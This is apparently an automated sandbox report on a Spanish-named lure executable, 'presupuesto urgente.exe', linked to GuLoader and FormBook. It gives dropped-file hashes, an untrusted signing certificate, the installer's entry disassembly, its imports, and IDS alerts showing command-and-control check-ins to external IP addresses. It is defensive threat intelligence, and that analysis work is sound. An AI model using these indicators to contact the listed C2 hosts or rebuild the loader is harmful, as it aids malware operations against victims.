                                                                                                                                  C:\Users\user\AppData\Local\Temp\nsl6F0B.tmp\System.dllPEDIDO-144797.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                    PEDIDO-144797.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                      rpedido-002297.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                        rpedido-002297.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                          FACTURA-002297.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                            FACTURA-002297.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                              LisectAVT_2403002A_41.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                LisectAVT_2403002A_41.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                  Inventory_list.img.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                    Process:C:\Windows\SysWOW64\winrs.exe
                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):135168
                                                                                                                                                    Entropy (8bit):1.1142956103012707
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6kvjd:8t4n/9p/39J6hwNKRmqu+7VusEtrd
                                                                                                                                                    MD5:E3F9717F45BF5FFD0A761794A10A5BB5
                                                                                                                                                    SHA1:EBD823E350F725F29A7DE7971CD35D8C9A5616CC
                                                                                                                                                    SHA-256:D79535761C01E8372CCEB75F382E912990929624EEA5D7093A5A566BAE069C70
                                                                                                                                                    SHA-512:F12D2C7B70E898ABEFA35FEBBDC28D264FCA071D66106AC83F8FC58F40578387858F364C838E69FE8FC66645190E1CB2B4B63791DDF77955A1C376424611A85D
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Users\user\Desktop\presupuesto urgente.exe
                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):11776
                                                                                                                                                    Entropy (8bit):5.659384359264642
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:ex24sihno00Wfl97nH6BenXwWobpWBTtvShJ5omi7dJWjOlESlS:h8QIl972eXqlWBFSt273YOlEz
                                                                                                                                                    MD5:8B3830B9DBF87F84DDD3B26645FED3A0
                                                                                                                                                    SHA1:223BEF1F19E644A610A0877D01EADC9E28299509
                                                                                                                                                    SHA-256:F004C568D305CD95EDBD704166FCD2849D395B595DFF814BCC2012693527AC37
                                                                                                                                                    SHA-512:D13CFD98DB5CA8DC9C15723EEE0E7454975078A776BCE26247228BE4603A0217E166058EBADC68090AFE988862B7514CB8CB84DE13B3DE35737412A6F0A8AC03
                                                                                                                                                    Malicious:false
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                    • Filename: PEDIDO-144797.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: PEDIDO-144797.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: rpedido-002297.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: rpedido-002297.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: FACTURA-002297.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: FACTURA-002297.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: LisectAVT_2403002A_41.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: LisectAVT_2403002A_41.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: Inventory_list.img.exe, Detection: malicious, Browse
                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L.....uY...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..`....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Users\user\Desktop\presupuesto urgente.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1373370
                                                                                                                                                    Entropy (8bit):3.900890255684548
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12288:Xmz13uukjak7s0jS8vhL91GbgdQZIKfMiaDacDU0A0K:UNuzD+gDUrR
                                                                                                                                                    MD5:DA817DD2FF7DF00798124C9316B89865
                                                                                                                                                    SHA1:924BED611E5CA8AE2A767779353A3C50022C4B84
                                                                                                                                                    SHA-256:C1C4F27D850CCA276D4665B5F5B2254837831EE462009A03B39781E28DDF8CE9
                                                                                                                                                    SHA-512:ABDDBCDF8FFA41AC84DF645C3B355A3A59C0AA55FFA4C758015D29B73CA7D9411ABFB9FF98422ABE39D4A808287FE236D017330D15B5DAA27CFA1E3B11F83D40
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.8......,........................)......t7.......8..........................................................................................................................................................................................................................................G...J...........%...j...............................................................................................................................U...............'...'...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Users\user\Desktop\presupuesto urgente.exe
                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):452714
                                                                                                                                                    Entropy (8bit):2.6437725125591145
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:Jxvhq0/c8zEEGKyHdqdqTZIhz+fMikFN905P4:TvhL91GbgdQZIz+fMiaN9ag
                                                                                                                                                    MD5:31FA6D00190DA55D190F69027CD409CC
                                                                                                                                                    SHA1:6E40E777863649597448A8A8C4A88B4DEB77D2CE
                                                                                                                                                    SHA-256:BF04A6E6A09EAD8B83EF15BF34E3D151C5F683D869D02F6DFFCFC632DD130BE7
                                                                                                                                                    SHA-512:5650B68EC2FE4A0C8F068A9EA27CD9A7BAADC2151BB819C7FB0087807D39F860D4B0AC5402C6FFFBA9AE43C7E07D42E9643A3FD17AB0DCFEE715CCF499CB5CB5
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:00000000ADAD00000000000000280000D5D5D50081001C0000009D003C3C3C3C3C3C00002300F1F100000043434300003200007676009A9A9A000000D50016161600A500000080808080000000003F0000000000B5B5B5000000F10000000000C700008888880004040000D20000151500CD000000969600E3E3E3000000F6F60000001F1F00E100730000FF00006800A9A9A900F8F8000000AF000084006E0000750076000A0A0A0000A800151500A700969600B3B3B30000000B00EEEE00008D8D0000303000D9D9004545450071000F0F0072720000D3001212005454007C000099000000000000DD000071710000EEEE0000002D2D00AC00D2005800000D00000000000020001313131313130052000026000000000000CCCC0025250000000000000000FDFD002F0000373700007D7D001F0062005A5A000000D600AD0000BD00009100BEBEBEBEBEBE00CECE00006A0000007D7D00000000FFFF0000000046464600000000ED0000F4F400003B009200C3C3C3004E4E4E4E00B4B4B4000000D10000000000828282009E0086000089898900005E000000CA006969000000770000640000B2B2B200005200F2008F0082005D00007B7B7B7B005B0047000000FC0000001515006969000000D9000000E5E5E5E5E5000F005757001A002A000000000000C5C500000C0C0000970000004A00
                                                                                                                                                    Process:C:\Users\user\Desktop\presupuesto urgente.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):219226
                                                                                                                                                    Entropy (8bit):7.436492024340276
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:132zftwOsH2Pnuw9B01E8qxXPDgs2MdpBw7opajuN5Vs9oY7sTtZXMGa3QGkCCLH:1mz1AWPuCXkslB+yajwk7sxKGsjkhkS
                                                                                                                                                    MD5:03016A728D29C285C8CBA4EE426ED89D
                                                                                                                                                    SHA1:776E51BCDEB03EB45E67563C52C8FEC881CC95E1
                                                                                                                                                    SHA-256:20B21594F8F281C5A47ABBBF0D9FC745DDE6EC535E5E6272FF96D1D2DFB13942
                                                                                                                                                    SHA-512:0E23540F06D8423BD0E3E3412988D0C820B3EC0BF7E23A4365AFA4FE8994C1D09B4F8D5B7C2BCA38142322F04B617B3239585147DB052295C0F292E34AB46D6D
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:....uuuuuu..g...s..:::.. ....jjj.SS........OOOO.........}}}....................]]]]]]...................%%.....&&.......8...............s.....................P...tttt........p.....................................qq...I..............##.2.....[[[[..........................'........MMM......]]]......................................................................SSSS..............................................NN..}}}.R............[[......_.........;.yy.>>..........)))....GGGG..nn......qq..!!!..l.(((....|.....................!....@@@@.....w....................J...FF....p......2.......................cc../..............K..............F...v................HHH.}}}.?.^...............VVVV.....^^^^^^^.........N.//.........v...BB..........t.....................Q..PPP............v...777.........LLLLLL...........K.......22..........).........E..........P.....................r...........[[..............E....##.........9..zzzzz.....I................88....cc.......n.,,,,................DDDD.........
                                                                                                                                                    Process:C:\Users\user\Desktop\presupuesto urgente.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):523
                                                                                                                                                    Entropy (8bit):4.30492942039079
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:nGy3qcf5opzE6vCdgLMc/Uqv7FE7KRbqYUH6uN0u8vM:GEpxoy6adY/UqvZEwbql6uNh
                                                                                                                                                    MD5:B33890A43FB0F38B6DDF18C5BCEFE234
                                                                                                                                                    SHA1:80ED178A92C2B5CB530AEE4673FFC9011EBF86BB
                                                                                                                                                    SHA-256:3BF02F982A76A4C896FDA78C1C4B2B730D690DD86475213DC415269D4629407B
                                                                                                                                                    SHA-512:169E2D067337BF05BA08D615CE61B28CA4FD93D204966B3386FB4B373D9BACD689BEE3DDC5E04A4F19586E585263F62BC40B0944A10E5867C63C9C7236A5CC48
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:clisiocampa percussing acronyctous petitesses pilgrimsrejser zygosphene miasmology konkyljens..labelable kraftls veneries symbolically duncan sulemadens,logopdisk genuinenesses pseudoinspirational bekenderen.franciscanism krftcellers drylots toksikologiskes rottegiftes impecuniary slisken autokratiets hjertebaandet banegaardsbygningen choenix..adrenocorticotropic mangfoldigheders avisudvikling ekstremitetens skamsloges nrede unpersuasion trachling tvrformatets..negerbolle suppressionen lustful bagels flamenco selrets,
                                                                                                                                                    Process:C:\Users\user\Desktop\presupuesto urgente.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):276551
                                                                                                                                                    Entropy (8bit):1.2459972317120458
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:q5eLWls2nEEvz9mAEPesDf7zRhfRKrtTgtOnumyYJBW+JAILJcqhOzwnasNP2r2J:q86nLDJnJuki2BaFsfRz
                                                                                                                                                    MD5:0071DC51C79F0655F0BB77074D56B1D7
                                                                                                                                                    SHA1:9617AE1434B07532BAAF39D69CF720C05B85E8F9
                                                                                                                                                    SHA-256:0628FA8F44795D79D5B855E8387985E04D134E8B57FE4D57E663FBAED278DF89
                                                                                                                                                    SHA-512:E2149E9F3B18DCB50E49EC51226D7A6BF3969E119B385410E80E431024B25A938C965C743D80C0C1D8A3820D0DDDA14464CAC75F73AE22F259B447264F8431BA
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:........................................................#..................................................................................E........R...............................]......................W...\......O.........................................$9......4.............................;..........X........................Z........"..............................................................................;..........U.....................^.....................l.......................3...................~............u.........................................e......P..................................H..............................................................................2.........2.................>....................................................................................................................+.......z....................A..$.........................................................................................]........?..............................
                                                                                                                                                    Process:C:\Users\user\Desktop\presupuesto urgente.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):398154
                                                                                                                                                    Entropy (8bit):1.2543435533086644
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:8IfJmHKeJzuGrd0myk0Ek5rFnJd62xZ9WEmaslkcO:8omHKAJR0T8axr
                                                                                                                                                    MD5:7BA8E260D6477B4FD16DAE2D14EA4482
                                                                                                                                                    SHA1:16873CB5BFBA899D4ED937603AA9980F119695D6
                                                                                                                                                    SHA-256:C19F7B3F1A20E1529113EE69AA53DB6E124A51F03098E6FB6AF0E76037C85B8B
                                                                                                                                                    SHA-512:ECAA786515C73B08A44C22FD48B205166611750EC633849823A88BBF95A675CA29FB7F22E652EFCFC055FC92F8381FC6276F4B732F91612A2385BF670131FFF2
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:...................z...................................................1........................................T.......r...........................'......................O..................|......P.................................0.....................................).......................l.............S..^......Z.........E.................................{.....................................................................................................................................................................$...........*................................................D........y....................................0..........|........m............................G.............Q...........>...s.......C...................................................".....................................................................+.......................L...6.......................................................................`.................................k.....................
                                                                                                                                                    Process:C:\Users\user\Desktop\presupuesto urgente.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):37
                                                                                                                                                    Entropy (8bit):4.046762824854522
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:lgov8fOMy:XHB
                                                                                                                                                    MD5:CFDA8E6AADE7958F94A959BDB29CB209
                                                                                                                                                    SHA1:59C459E105A7AF33D13A365F735E3CB7B8E5DDB0
                                                                                                                                                    SHA-256:B4543E8AB4997934D2EDC7DE8A76A24B7C2CCB641212AE3B9B17FE05B71D3E87
                                                                                                                                                    SHA-512:EDFDCA00667ED3A5558F7E614373F0B8393763A979154666972C659CB44E75CCD51170E4E2189043046EB4DDB8A68642BBDB6F98A0E494E76E86FAAF14F993B2
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:[xanthippe]..sikkerhedsgraden=preve..
                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                    Entropy (8bit):7.244448418739602
                                                                                                                                                    TrID:
                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                    File name:presupuesto urgente.exe
                                                                                                                                                    File size:582'088 bytes
                                                                                                                                                    MD5:8ae672783481c0b46780431bfce5a216
                                                                                                                                                    SHA1:ace989f4c2a82f48cc3167e531ab13d2999537b2
                                                                                                                                                    SHA256:5e279ef4c54dfc525f423b98054f37ee6eb51a71e8c1f76d5438393055442173
                                                                                                                                                    SHA512:be1f8b04c0ff14dfb85089a1311f6fcffaa26db076d6889f756a077503430d7d7ff2cdfc944ed7ef1a47a7f88ad374834c8b945fb96ab1a82f09573c98a54d83
                                                                                                                                                    SSDEEP:6144:wIw3/aiZzcfWAnp3NRmqRAV596VJk4PGJ5zkk2vZBKmXSSwrw:Ma/1MVzim5zF2hwymw
                                                                                                                                                    TLSH:F0C4DF9B6ED2C9EED4530A3099E5B5B0B1F1ADF09B03990767B33AFD2C31E618E05215
                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....uY.................d...*.....
                                                                                                                                                    Icon Hash:5ce633391c1c0601
                                                                                                                                                    Entrypoint:0x403489
                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                    Digitally signed:true
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                    Time Stamp:0x5975952E [Mon Jul 24 06:35:26 2017 UTC]
                                                                                                                                                    TLS Callbacks:
                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                    OS Version Major:4
                                                                                                                                                    OS Version Minor:0
                                                                                                                                                    File Version Major:4
                                                                                                                                                    File Version Minor:0
                                                                                                                                                    Subsystem Version Major:4
                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                    Import Hash:1f23f452093b5c1ff091a2f9fb4fa3e9
                                                                                                                                                    Signature Valid:false
                                                                                                                                                    Signature Issuer:CN="Adusk Mellemhandler ", E=meteoritics@Vacuolate.Je, L=Sanford, S=Michigan, C=US
                                                                                                                                                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                                    Error Number:-2146762487
                                                                                                                                                    Not Before, Not After
                                                                                                                                                    • 05/09/2024 11:36:49 05/09/2027 11:36:49
                                                                                                                                                    Subject Chain
                                                                                                                                                    • CN="Adusk Mellemhandler ", E=meteoritics@Vacuolate.Je, L=Sanford, S=Michigan, C=US
                                                                                                                                                    Version:3
                                                                                                                                                    Thumbprint MD5:B289B9B21F52A17FDC61A0D70D86F1B8
                                                                                                                                                    Thumbprint SHA-1:DBE4A4D453126B6BF0C2598625BB04CE9CD1C5D5
                                                                                                                                                    Thumbprint SHA-256:344BFA8915E4912A82E48C85E479AF071690941A2C0E3DAAF3804C3454FDEBBC
                                                                                                                                                    Serial:247A1D845B68D30CAE805BFEE406FB9766A77266
                                                                                                                                                    Instruction
                                                                                                                                                    sub esp, 000002D4h
                                                                                                                                                    push ebx
                                                                                                                                                    push esi
                                                                                                                                                    push edi
                                                                                                                                                    push 00000020h
                                                                                                                                                    pop edi
                                                                                                                                                    xor ebx, ebx
                                                                                                                                                    push 00008001h
                                                                                                                                                    mov dword ptr [esp+14h], ebx
                                                                                                                                                    mov dword ptr [esp+10h], 0040A230h
                                                                                                                                                    mov dword ptr [esp+1Ch], ebx
                                                                                                                                                    call dword ptr [004080ACh]
                                                                                                                                                    call dword ptr [004080A8h]
                                                                                                                                                    and eax, BFFFFFFFh
                                                                                                                                                    cmp ax, 00000006h
                                                                                                                                                    mov dword ptr [0042A24Ch], eax
                                                                                                                                                    je 00007F5758AF7A63h
                                                                                                                                                    push ebx
                                                                                                                                                    call 00007F5758AFAD11h
                                                                                                                                                    cmp eax, ebx
                                                                                                                                                    je 00007F5758AF7A59h
                                                                                                                                                    push 00000C00h
                                                                                                                                                    call eax
                                                                                                                                                    mov esi, 004082B0h
                                                                                                                                                    push esi
                                                                                                                                                    call 00007F5758AFAC8Bh
                                                                                                                                                    push esi
                                                                                                                                                    call dword ptr [00408150h]
                                                                                                                                                    lea esi, dword ptr [esi+eax+01h]
                                                                                                                                                    cmp byte ptr [esi], 00000000h
                                                                                                                                                    jne 00007F5758AF7A3Ch
                                                                                                                                                    push 0000000Ah
                                                                                                                                                    call 00007F5758AFACE4h
                                                                                                                                                    push 00000008h
                                                                                                                                                    call 00007F5758AFACDDh
                                                                                                                                                    push 00000006h
                                                                                                                                                    mov dword ptr [0042A244h], eax
                                                                                                                                                    call 00007F5758AFACD1h
                                                                                                                                                    cmp eax, ebx
                                                                                                                                                    je 00007F5758AF7A61h
                                                                                                                                                    push 0000001Eh
                                                                                                                                                    call eax
                                                                                                                                                    test eax, eax
                                                                                                                                                    je 00007F5758AF7A59h
                                                                                                                                                    or byte ptr [0042A24Fh], 00000040h
                                                                                                                                                    push ebp
                                                                                                                                                    call dword ptr [00408044h]
                                                                                                                                                    push ebx
                                                                                                                                                    call dword ptr [004082A0h]
                                                                                                                                                    mov dword ptr [0042A318h], eax
                                                                                                                                                    push ebx
                                                                                                                                                    lea eax, dword ptr [esp+34h]
                                                                                                                                                    push 000002B4h
                                                                                                                                                    push eax
                                                                                                                                                    push ebx
                                                                                                                                                    push 004216E8h
                                                                                                                                                    call dword ptr [00408188h]
                                                                                                                                                    push 0040A384h
                                                                                                                                                    Programming Language:
                                                                                                                                                    • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x570000x220b8.rsrc
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x8cea80x1320
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                    .text0x10000x63d10x6400139645791b76bd6f7b8c4472edbbdfe5False0.66515625data6.479451209065IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                    .rdata0x80000x138e0x1400007eff248f0493620a3fd3f7cadc755bFalse0.45data5.143831732151552IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                    .data0xa0000x203580x600ec5bcec782f43a3fb7e8dfbe0d0db4dbFalse0.501953125data4.000739070159718IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                    .ndata0x2b0000x2c0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                    .rsrc0x570000x220b80x2220030cc4d5ad2d805f600d8d9358a38829aFalse0.1827066163003663data2.9689436080399076IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                    RT_ICON0x572c80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishUnited States0.14975452502070272
                                                                                                                                                    RT_ICON0x67af00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864EnglishUnited States0.18344019339920117
                                                                                                                                                    RT_ICON0x70f980x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384EnglishUnited States0.21953235710911667
                                                                                                                                                    RT_ICON0x751c00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States0.2731327800829875
                                                                                                                                                    RT_ICON0x777680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States0.3428705440900563
                                                                                                                                                    RT_DIALOG0x788100x120dataEnglishUnited States0.5138888888888888
                                                                                                                                                    RT_DIALOG0x789300x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                    RT_DIALOG0x78a500xc4dataEnglishUnited States0.5918367346938775
                                                                                                                                                    RT_DIALOG0x78b180x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                    RT_GROUP_ICON0x78b780x4cdataEnglishUnited States0.8026315789473685
                                                                                                                                                    RT_VERSION0x78bc80x1b0dataEnglishUnited States0.5601851851851852
                                                                                                                                                    RT_MANIFEST0x78d780x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                                                                                                                    DLLImport
                                                                                                                                                    KERNEL32.dllExitProcess, SetFileAttributesW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, SetCurrentDirectoryW, GetFileAttributesW, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, GetShortPathNameW, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalUnlock, GetDiskFreeSpaceW, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                                                                                    USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                                                                                                                    GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                                                    SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                                                                                                                    ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                                                                    COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                                                    ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                    EnglishUnited States
                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                    2024-10-04T11:56:21.886022+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204981591.195.240.1980TCP
                                                                                                                                                    2024-10-04T11:56:21.886022+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204974713.248.169.4880TCP
                                                                                                                                                    2024-10-04T11:56:21.886022+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204977991.195.240.1980TCP
                                                                                                                                                    2024-10-04T11:56:21.886022+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204979513.248.169.4880TCP
                                                                                                                                                    2024-10-04T11:57:17.645384+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.11.2049730142.251.40.174443TCP
                                                                                                                                                    2024-10-04T11:58:03.329695+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204973291.195.240.1980TCP
                                                                                                                                                    2024-10-04T11:58:18.917234+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049733185.134.245.11380TCP
                                                                                                                                                    2024-10-04T11:58:21.626476+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049734185.134.245.11380TCP
                                                                                                                                                    2024-10-04T11:58:24.346707+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049735185.134.245.11380TCP
                                                                                                                                                    2024-10-04T11:58:27.063852+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049736185.134.245.11380TCP
                                                                                                                                                    2024-10-04T11:58:32.494751+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049737184.73.212.5180TCP
